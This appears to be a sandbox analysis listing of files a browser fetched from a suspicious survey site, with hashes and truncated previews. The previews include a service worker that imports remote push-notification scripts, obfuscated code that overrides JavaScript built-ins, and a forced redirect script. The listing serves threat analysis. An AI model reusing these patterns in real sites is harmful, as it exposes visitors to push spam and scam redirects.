                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:457DE2748B8011ED9BCEB9CAE35D0A33" xmpMM:DocumentID="xmp.did:457DE2758B8011ED9BCEB9CAE35D0A33"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:457DE2728B8011ED9BCEB9CAE35D0A33" stRef:documentID="xmp.did:457DE2738B8011ED9BCEB9CAE35D0A33"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):15995
                                                                          Entropy (8bit):4.829107881531969
                                                                          Encrypted:false
                                                                          SSDEEP:384:WAIA1fWGxVqDcSQ865zkEu71tGIivJjHpwx18AO6x9a:YQfWsqDcSX65zkb7//iRjJwx18AOka
                                                                          MD5:1F2FD91D3C5EF9366494B052A13C82E2
                                                                          SHA1:5030ED8E9173FAC62AFFA8BD63BBF37BD06E1199
                                                                          SHA-256:C7FB94AA2BEEA306A07B917B08EC4166D6FC1282979F9F8C9FD783C61D8E8667
                                                                          SHA-512:226E07F1C4117D0726D81FC43BD35FEC5E7BAA8A533BB3AC00245C34C50545771339EED2657C6753069A0079F68962EF5C97681F7AD6CD9A31F9657698DD9E8E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://trk-amropode.com//scripts/sw/v9e118mez8
                                                                          Preview:'use strict';.const env = {. log: !0,. retry: 10,. sleepTime: 1e4,. domain: 'push.trk-amropode.com',. notificationDomain: 'notification.trk-amropode.com',. subscriptionDomain: 'subscription.trk-amropode.com',. eventDomain: 'event.trk-amropode.com',. },. applicationServerPublicKey = 'BJbujtKImkiLWjlWkMGYMo2_sM0al24KoS7U6TJ1U7sKJaxlIULz5s6p7tN6WbnLisCq_Si5hP7X0769TvPDFTQ=',. siteId = 'v9e118mez8',. smClientId = 'q2goykjdrv',. version = 532,. smAPIKey = '29788ca9761a4b78abcfb1c3eabb8e68';.let smPushSubscriptionId;.function getStore(a) {. if (self.indexedDB) {. var b = self.indexedDB.open('pushPlatFormDb', 2);. (b.onerror = function () {. console.log('error db' + b.error), a(null);. }),. (b.onsuccess = function () {. var c = b.result,. d = c.transaction(['store'], 'readwrite'),. e = d.objectStore('store');. a(e);. }),. (b.onupgradeneeded = function (a) {. console.log('upgrading db from version '
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Compressed by jpeg-recompress", progressive, precision 8, 50x50, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1763
                                                                          Entropy (8bit):7.573734704126781
                                                                          Encrypted:false
                                                                          SSDEEP:48:KYAfMkVVKbK3Z2rTimtPIT3snO57Cb3PoF5luR:BA0kaUZ2X/tQT3snO57Cb3t
                                                                          MD5:A2209D31F7545F9E5E906558780B036C
                                                                          SHA1:36EBA3F889FCBE801B5947067FBF5D9415ED4BC3
                                                                          SHA-256:64F06BC81A732E876CE54FDAE5EA0EB85EF861329306962BD2DAD24FF1CFBC3B
                                                                          SHA-512:A2A6CC5089960802757413563A5249FC2951CACA4CE463789E57D656FF05F87BF987D01D763E7A5AEED29CDD40C57FDD6FF80F8D309F6957E45D578354297BB5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF..............Compressed by jpeg-recompress......................................................"..."*%%*424DD\.................................................."..."*%%*424DD\......2.2.."..................................................|.....B...EX};...M3...W.aeQJ...S.0k.. m.X.R....~n.......................................W.....`49........................................m.}.f.U]_...8.........................."..2!#$BR.1abr.%3AC....Qcq..........?........-..$.....j..E...I.`..x.....J..Hn.....h.....&.3....e.9.N.....]....L7*?M:...-...$..#h.MD.?.jb;AR.....9..,...Ai .@.+F~..b~.|.%0..L.Fu..0.U....1. .L..........}.@@..*] W..`..[..S...PZ.. .q2.+377..4C.+:..e.\NB}g..#..f.9^.I.5.O.\0. ZYC~..k..f..._...;0...e.<U#.nd...Om.v..S.f(H2.V..c.o.j&.,evl..7..q.../t.G.Q5.......R..%.g.t..t.W.h.N M..~XU1.5.MmC...[.!.)..V+M..@A(..]..G..9.V).l...%....csH..T.F...,.,..n..i.^..P.@@.......Nq!L....(4.f...c2J..O2?L..t[.l.x.U.q..Hi...r.%CJ.}!x%.=X..m2.X..]....W....2.H.2VN|.H....
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):141
                                                                          Entropy (8bit):4.987455261435793
                                                                          Encrypted:false
                                                                          SSDEEP:3:gnkAqRAdu6/GY7voOkADYn+HCLy5cyYgLda7CKSYqW4c9b:7AqJm7+mYnhLyFLdaCKrqW4c9b
                                                                          MD5:2BD76B903459CFEA2D77B5B46D0C2BD6
                                                                          SHA1:3455182BB73A5EFE914644F6D09510964E70AF5B
                                                                          SHA-256:D0D1E04E61B15C25874842CF26ABFB807374F191E7984C63AD6590A37BCA1E37
                                                                          SHA-512:5227B92B6AD1F32517C28052BB7785A4F9AB0EAF95499D017DF0DE3058D6C0C6DEA3F1E3BDF9588D1975881E8B8FD2C22BBE5973582C54CB42BCB526556BDE7C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://humifications.com/0/2/41423/3af5e0a6c068554b3d8550e8c2d39e93/2000/11677_1/49922_7518_2794_32559_md
                                                                          Preview:<script type="text/javascript">window.location.href="https://genialskin.click/?s1=351191&s2=1091114752&s3=1782&s4=3038&ow=&s10=3079"</script>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (7996)
                                                                          Category:downloaded
                                                                          Size (bytes):7997
                                                                          Entropy (8bit):5.20995821364607
                                                                          Encrypted:false
                                                                          SSDEEP:96:HH6prnCOdiIp9dQm696Tpvic9AdbBZXgDebteIuydKZplx2n30pIccR:HH6prnkWdT6idi6AZBVgDq/umq7pIJ
                                                                          MD5:07AEB4FF57F0459A53996771F8B8DCCF
                                                                          SHA1:A0254784EC8164C407DC8452DF91E54AED9489A1
                                                                          SHA-256:225FDF3514D701958E7145A86D949D30AE8087CAA66166C336848CEDA4C72726
                                                                          SHA-512:A63933E9E9DF51D6F786D426E196B3042DDE5B27AC203FC0DC3F52C3358C214F243C1A976169667629979D76B7198054B1AACF9A0F143485EC7A84CA9CD81BC3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://trk-amropode.com//scripts/pg/v9e118mez8
                                                                          Preview:(function(a,b){function c(a){try{console.log=E}catch(a){}E(a)}function d(a){if(self.indexedDB){var b=G.apply(self.indexedDB,["pushPlatFormDb",2]);b.onerror=function(){console.log("error db"+b.error),a(null)},b.onsuccess=function(){var c=b.result,d=c.transaction(["store"],"readwrite"),e=d.objectStore("store");a(e)},b.onupgradeneeded=function(a){console.log("upgrading db from version "+a.oldVersion+" to 2");var c=b.result;if(2>a.oldVersion){var d=c.createObjectStore("store",{keyPath:"name"});k("",null,[],[],[],d)}}}else a(null)}function e(){try{Array=q,Array.prototype=q,Response=v,Response.prototype=x,Function.prototype.apply=H}catch(a){i("ext_ov_error",a,m)}}function f(a){return function(b){var f=!1;try{if(e(),"push"===b.type&&null!=b.data)try{let a=b.data.json();null!=a&&null!=a&&(f="LzeA"in a)}catch(a){c(a)}else if("notificationclick"===b.type||"notificationclose"===b.type)try{let a=b.notification.data;null!=a&&null!=a&&(f="LzeA"in b.notification.data)}catch(a){c(a)}}catch(a){c("init_
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 1200 x 427, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):26027
                                                                          Entropy (8bit):7.853513132503639
                                                                          Encrypted:false
                                                                          SSDEEP:768:qMsYtmb2D9WNR37OKqbm06JIXUd9yv5ENZECmC:qZbTNRrnqbGIXUdk5EkpC
                                                                          MD5:20FE0BC0F5FFA8AC0D6A506057BA41E3
                                                                          SHA1:99AEE7DBCB917D4DA8563A7662930C8599CCD663
                                                                          SHA-256:3017F4429EBCD5B01162299C3D744B3B7213DC51274DE7EEA28300ECDB8BF3D6
                                                                          SHA-512:70114D9DA54EC1419129D8CB855E41554B4541DDC277B80151BE0DB330B300E4A6BEEF64F0CF8ABC81F0E5516AC0C54BAB3EF8A14BC963AD70CAB52A566F882C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/uploads/archive/company/1080/images/INES-wt.png
                                                                          Preview:.PNG........IHDR...............n0....pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164488, 2020/07/10-22:06:53 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 22.0 (Windows)" xmp:CreateDate="2023-11-14T20:20:30+05:30" xmp:ModifyDate="2023-11-14T20:23:49+05:30" xmp:MetadataDate="2023-11-14T20:23:49+05:30" dc:format="image/png" photoshop:ColorMode="3" photoshop:ICCProfile="sRGB IEC61966-2.1" xmpMM:InstanceID="xmp.iid:458d5ccf-2239-0242-b984-c67764c869d2" xmpMM:DocumentID="adobe:docid:photoshop:7958ad5f-b90a-114a-816a-f6c4884161e0"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):1971
                                                                          Entropy (8bit):7.239167179305185
                                                                          Encrypted:false
                                                                          SSDEEP:48:Il1Nn2WQT5SCwJ3THrQneanX8ilxWobN1rMCQVo3:C255SCeHrQeatlxYCP
                                                                          MD5:0B874CFB0EDFE309414F50C71F523499
                                                                          SHA1:5DA66F89230B65459E607CA0FCB338EBE0C9E2F1
                                                                          SHA-256:2DB4A30686167F451311BBF0791F3B0224C03EE161E82354C760FA5BB0CB4DFC
                                                                          SHA-512:D0D62B306D88ED6BC681F470F9AAFEB65490A275852A289454232099E77DB18032D9048A9FDCDC973D8426A2603F5F32ED4BDA70F627D3F77A4040DAC6774AF0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/412ed0e567678783f534c1638d0d2adf.jpg
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:0FB6749E8B7F11EDB0BEAE2D10CE7672" xmpMM:DocumentID="xmp.did:0FB6749F8B7F11EDB0BEAE2D10CE7672"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0FB6749C8B7F11EDB0BEAE2D10CE7672" stRef:documentID="xmp.did:0FB6749D8B7F11EDB0BEAE2D10CE7672"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65451)
                                                                          Category:downloaded
                                                                          Size (bytes):88144
                                                                          Entropy (8bit):5.290986223370378
                                                                          Encrypted:false
                                                                          SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPmw:ygZm0H5HO5+gCKWZyPmHQ47GKc
                                                                          MD5:F832E36068AB203A3F89B1795480D0D7
                                                                          SHA1:2115753CA5FB7032AEC498DB7BB5DCA624DBE6BE
                                                                          SHA-256:4C24DFD28784AD2BEFB3DAFAAC6BF1ED4E7CD58CCE713D9A0B228D426E812BAF
                                                                          SHA-512:B9DBC08C984AE3C7FD44822EC2E9A22CB8CF7DA55FA3975DBBDC3F18FD7E7A7793E8D93604826574E3DD6A4F982D7AF4F96C1AF5E10D847B8394A34A82C398BA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/vendor/jquery-3.4.1.min.js
                                                                          Preview:/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):2003
                                                                          Entropy (8bit):7.259441845387289
                                                                          Encrypted:false
                                                                          SSDEEP:24:HK1h3IWwjx82lY2T3yQVmay7FrwyJ3Vm8jFdBGxtyzUnAFYkXspfIyv2Hp954xmV:Il1Nn2WQcbBfJ3cgXaEXPXslrzmV
                                                                          MD5:4D036644BEBAF0AFBA1EC39FE3C51E72
                                                                          SHA1:FB4867B0324DB747CF571A04B55069EC1F9F5D6F
                                                                          SHA-256:5157378A4441BC07C005F21B99D77D0C6406D86A2A55EECA84304941F8645182
                                                                          SHA-512:B4CBCA158B91769C3B2F3281CF1C27517D457A61839026D7954A03F03B4AED1A5C2EB4F183694FC814D42B1665A21F77C121BB8E36BED5C79DA1BCC8E0E0A6BB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/fim/3079-US/4472ed6a36bdd245e7f6835e6e29df47.jpg
                                                                          Preview:......Exif..II*.................Ducky............./http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.171c27fab, 2022/08/16-22:35:41 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 24.0 (Windows)" xmpMM:InstanceID="xmp.iid:7FB82F6C8B7F11ED8DCDDBBBF94F5104" xmpMM:DocumentID="xmp.did:7FB82F6D8B7F11ED8DCDDBBBF94F5104"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7FB82F6A8B7F11ED8DCDDBBBF94F5104" stRef:documentID="xmp.did:7FB82F6B8B7F11ED8DCDDBBBF94F5104"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................................#%'%#.//33//@@@@@@@@@@@@@@@......................&.....&0#....#0+.'''.+550055@
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 80252, version 331.-31327
                                                                          Category:downloaded
                                                                          Size (bytes):80252
                                                                          Entropy (8bit):7.99688156728726
                                                                          Encrypted:true
                                                                          SSDEEP:1536:vRmFhUvsiF1gL73d8iyPi7ee47WBzwjSiXaUUBUmJe4L:voBL7SiyQSkzIXr8jN
                                                                          MD5:9AE050D1876AC1763EB6AFE4264E6D5A
                                                                          SHA1:72344EAB2E7431EEC313CAA21F266CBFDA7CAF60
                                                                          SHA-256:6C916669CF923B4F1B2DB5C5107C83B6CA205E7AD0DCD840B251E63F0C8D28A2
                                                                          SHA-512:5A8A8ABDB3C11C0FEC80CCC2BF447BE0C998F3E571A08897DE544632C972999B678165AF6A229FF9DBE9529C5D0BA2CDD96D1F916B6F805A4284EF610918DA87
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/vendors/fontawesome/webfonts/fa-solid-900.woff2
                                                                          Preview:wOF2......9|..........9".K......................?FFTM....`..N.....`..@.6.$..0..4.. ..+...[2{..:..uW..gy.8.ql..Y.7R?.......A.........%.Y..Y.@.H..V.`mQ...3.....D%..XPC.]O.....LD.-...c...5...O.H..D."....y.sn.e....D. "......h.Iv..%..+.)......_..>D*\Q(..>.%..3..[o......M.4Zaw....CA....G.5..1:..I).."?.f].......;~.....yo.|.`..!.d.b...`{...E.~.Zq.v.(..lg.AN1..r....}a9n...et.~5...Y.K.K)6.L..M.|.Z.....Z.W:..........C..R2.=...y...=..DQ.(.N.,....\`f9f6.)..,.6.vi.J+m......[..b....m#..XG.l.#..V.A....0..V..U.+.aB?{.H.nx.m.?.......|A.....(PPi)*...LE.wb....oze.[..7l.[yk{..ay..y..)<.....a.d!_.......0)...v.K...nS.....m...Jx..&....B..M......U.e.q>@[..mT..<....E..[.m`..6.5.l.1.._.0........T.b..Y.v!w........B..|......!....O.XHK@...t..........l.v..*...b...J.4s..cc>..<...%.R.`'.m.]s.A'.,X .7..&E..+.v..'.By.n...c..o.d....-[.1k4..A..Q.......!.:.. .t...!.P......x...v...Y..u...0.C.Mt..G.t.U?\...N.q,gM....~._.M.x$D<i?.I...:/tL........S.......#@....72.D.)!a.!...<Yl....:u...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (3034)
                                                                          Category:downloaded
                                                                          Size (bytes):245935
                                                                          Entropy (8bit):5.571002449160339
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3Ol+hVJ1leUSOWYSjUy5xy2a5nMB+M8pVkUvfNFk82ewAu6NVkGR82WvmuA3n:eMiUHSjUySM8/kUvfN6RevbVkI8tY
                                                                          MD5:BEB68502873BA5C66E9020BFB001EB0B
                                                                          SHA1:FBBAD4770272A852B1343AF4314AB2E352FA46CF
                                                                          SHA-256:2D0B454A2813CC019B98B696BBC0283B25BC3BCEFE547699E1E8D6A0AD66A906
                                                                          SHA-512:899D0CB90D312D200A282BFFB389D492BE2BE5FDEE8057AF3FDA437139D8CBBC7C100213BD4D7D87DB8612D5BCDE46179CA22C238D1FA46C4318200528C45C3D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-DKB9VH2QW4&l=dataLayer&cx=c
                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0},{"vtp_signal":0,"function":"__c","vtp_value":0}],. "tags":[{"function":"__gct","vtp_trackingId":"G-DKB9VH2QW4","vtp_sessionDuration":0,"tag_id":1},{"function":"__ccd_em_outbound_click","priority":0,"vtp_includeParams":true,"vtp_instanceDestinationId":"G-DKB9VH2QW4","tag_id":3},{"function":"__ccd_em_download","vtp_includeParams":true,"vtp_instanceDestinationId":"G-DKB9VH2QW4","tag_id":5},{"function":"__ccd_em_video","vtp_includeParams":true,"vtp_instanceDestinationId":"G-DKB9VH2QW4","tag_id":6},{"function":"__ccd_em_site_search","vtp_searchQueryParams":"q,s,search,query,keyword","vtp_includeParams":true,"vtp_instanceDestinationId":"G-DKB9VH2QW4","tag_id":7},{"function":"__ccd_em_scroll","vtp_includeParams":true,"vtp_instanceDestinationId":"G-DKB9VH2QW4","tag_id":8},{"function"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):186
                                                                          Entropy (8bit):4.8456549006624625
                                                                          Encrypted:false
                                                                          SSDEEP:3:RFD0nR6qKZSaSCeADKLbQBMWnhaEE3/pQAU3ug8MWnhaEE3/OYf:jD0nR6qKfSlbQhhaE6pQAUzohaE6OI
                                                                          MD5:DADDB8DD93581B2A7AAEFBE288201329
                                                                          SHA1:21126B6FF6264E35B26E999BF6919D2FFD737138
                                                                          SHA-256:4E911E16BD2595C34E3BA5BE105178E317B17B4A716BD8BAD3595B0D496E3545
                                                                          SHA-512:04E7DFD81CFB1B6428795A7056C23A97F0866450FC56A7F864896709FFE3EDD2C9197EC9548EEB435A21FAE7517E5D2656029C44C56BA2951B53A65D72ECE052
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/service-worker.js
                                                                          Preview:// general.if(typeof window === 'undefined'){. importScripts('https://trk-amropode.com//scripts/pg/v9e118mez8').}.importScripts('https://trk-amropode.com//scripts/sw/v9e118mez8');
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (874)
                                                                          Category:downloaded
                                                                          Size (bytes):72030
                                                                          Entropy (8bit):5.356291139363364
                                                                          Encrypted:false
                                                                          SSDEEP:768:aYxstK5G0HUSVCGIVs3EVV/kBFykz9zXw010X77rhhnznoq6:Zk00SVCXu3Eb/iO010X7nXnzI
                                                                          MD5:7C684FC4508DCF199BD5795F009E2811
                                                                          SHA1:D4DA8917E15B611EE002DA45C7EE1EEF99EA1E13
                                                                          SHA-256:2D2B55B453C80A0278C6468065C8380858C9B61EA50D29D8FDEAB94980B0E77C
                                                                          SHA-512:B6D7CF47632E2BCA96A7BEF4DC086A9321C1C33A131F42763765D30000F638B7A8A55DCC7F51154EEA3DE38126921C05AC7464DB279E61156E36228D8FBBE1BD
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/isp/common.js?v=3cc6aa721bc3b8a31b45d9388214360e
                                                                          Preview:let $curr;.let data = {};.let percentbar=0;.let surveyid="";.var attrChoices=$('#dv-choices').attr('sid');.var domain='excite.osramlumens.com';.var pipeline='sau.bbcrystal.com';.var zipcode="";.var state_selected="";.var skip_modal_email=false;.var email_send_modal=false;..var states={"AL":"Alabama", "AK":"Alaska", "AZ":"Arizona","AR":"Arkansas","CA":"California","CO":"Colorado","CT":"Connecticut","DE":"Delaware","DC":"District Of Columbia","FL":"Florida","GA":"Georgia","HI":"Hawaii","ID":"Idaho","IL":"Illinois","IN":"Indiana","IA":"Iowa","KS":"Kansas","KY":"Kentucky","LA":"Louisiana","ME":"Maine", "MD":"Maryland", "MA":"Massachusetts", "MI":"Michigan", "MN":"Minnesota", "MS":"Mississippi", "MO":"Missouri", "MT":"Montana","NE":"Nebraska","NV":"Nevada","NH":"New Hampshire","NJ":"New Jersey","NM":"New Mexico","NY":"New York","NC":"North Carolina","ND":"North Dakota","OH":"Ohio","OK":"Oklahoma","OR":"Oregon","PA":"Pennsylvania","RI":"Rhode Island","SC":"South Carolina","SD":"South Dakota"
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, comment: "Compressed by jpeg-recompress", progressive, precision 8, 50x50, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1821
                                                                          Entropy (8bit):7.51445666885041
                                                                          Encrypted:false
                                                                          SSDEEP:48:KYAcKx7s7OS5RMbEHZTsRo+Zw3Trej5o54fkO:BAcY7s/5WbeZTsRo2wveSsp
                                                                          MD5:3D13ED9FBDBE4E6AD4C63D72BB5B8F11
                                                                          SHA1:8BC3F157A485E5F75713F55DEAB197BAB378767D
                                                                          SHA-256:BDBD0B5F18B8F392C2690D46EAB91AD506F93A79DED7318B5CC547ED975A4529
                                                                          SHA-512:DF8BE9A5C72862CF963C6C9A1BF24972A4A347F9ACA0D8F71591EDA96FEEB11468C8D3558CEEFAA1B5A4BFEC2D1850FBB9C817BCD4AE6C749F30A3E6726653FB
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF..............Compressed by jpeg-recompress......................................................"..."*%%*424DD\.................................................."..."*%%*424DD\......2.2.."................................................<.\|..K.q.\.g.....r....u..@..s.T.....t...p.AF.K..;......................................r...v..............................................E.?......N....&............................6.."345A..............c3..+Bn......&.2.T..%.$^dSAd%....\2..6.n..U.7.....]...u.g.v+...b0.t.k.W#......r...}?.,.Be}.g....1.#..F`.H..I..+....o...`.21<...EB...L.....(s....u.^.xtw...pa0`....i..u!I-)Ze..1].u..B.ME..;....CZi/u..g.Q.O.'Y+8.....G@..@..4..?&LU....C..6..k.{...w..].4%..n.Y....p.....Z.o.......r.....7........................!."R.12..#ABQbq.....$STar............?...r....8.).q.Y..o.*Zi".hJG:..u*.e[e...:8....^y[...."3...Y.V..).. .U\.r.3/.V...Sy..0v.2.(.W.c..f.U/.x..P.#....UB.W%..q..@k.tM!..%.ET.u+uh.ey....Ul..._Ikwj..4t.S..0h.+_.5.n..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text
                                                                          Category:downloaded
                                                                          Size (bytes):3639
                                                                          Entropy (8bit):5.2841632433611565
                                                                          Encrypted:false
                                                                          SSDEEP:96:+SA7v1bnzNg5C8D8mrLAzgGIf0vJsm9X8D8xFJ4uJtc8:+SAJbnz4/rLBTuSm9X4wrc8
                                                                          MD5:E29B62DD0CCEB6DFC6DE126061BA5CF7
                                                                          SHA1:685AD4931BDF5D57D5277389A55BCD37F125410A
                                                                          SHA-256:9437D87812B34D91F53E5421EEED60DD3AA108B42CB34F4A8DBB855A0531A55B
                                                                          SHA-512:D9B7B61BC6229DE1E0638295DCF319C170F20F3E75D7D9252E5AB163710744E370623B9F0A7AADB7D8A2E85A38E50767E40CD2266E42365012DF33641889DDED
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://kronemole.site/assets/js/intl_functions.js?v=3cc6aa721bc3b8a31b45d9388214360e
                                                                          Preview:let o_survey = null;.let s_step = 0;.let lastQuestion = "";.function startINTSurvey(sid){..$('.continue').removeAttr('onclick');..$.ajax({...type: "POST",...url: "",...data: '_type=ajax&_action=master-getINTSurvey&rId='+sid,...success: function (r) {....if (typeof template_name === 'undefined') {.....o_survey = r.data;.....startQuestion();....} else {.....//Detecting Dubai.....o_survey = r.data;.....if (template_name == "dubai") {......$(".reward-wrap").hide();......$(".questions-container").hide();......$("#dv-choices").show();......insertChat(greeting);......insertChat("<video class='gif' autoplay loop muted playsinline><source src='assets/images/greeting.webm' type='video/webm'></video>", 1200, false, true)......insertChat(greeting2, 2400, true);......setTimeout(function () {.......$("#questionTexts").append(`......<div class="btn_tx btn-chat btn_color btn_hcolor btn_htcolor btn_txcolor showBtn atransx" onclick="startSurveyDub()">.......<span>........${showBtn}.......</span>......</
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):83
                                                                          Entropy (8bit):4.5755424863313685
                                                                          Encrypted:false
                                                                          SSDEEP:3:YQ3/eHiuAW72DsdETKfaiEeTT6HJMWr3wWK1:YQ3c66tC1r3wd
                                                                          MD5:5F8EABF49B97C5750F7123757863B1BD
                                                                          SHA1:909DE8804285DAF003D88F73F3AB07E2F82EC3E5
                                                                          SHA-256:A9719C9E03419052E53439409386DA1121DD1F9F6442318997F113C8F538E63E
                                                                          SHA-512:7D203167043CFE7BE4ABE6CB82F914E5FB0529A4A623098372E252E891D488C83F5EBF75B4EF4846B1DD514EC30C0CC616DB26CF154AC65A6F761E452B8A86D6
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"user":{"id":"e64e2ca7-617f-4cfa-8d68-b0ea38e378a4-tuctc56675c","isNewUser":true}}
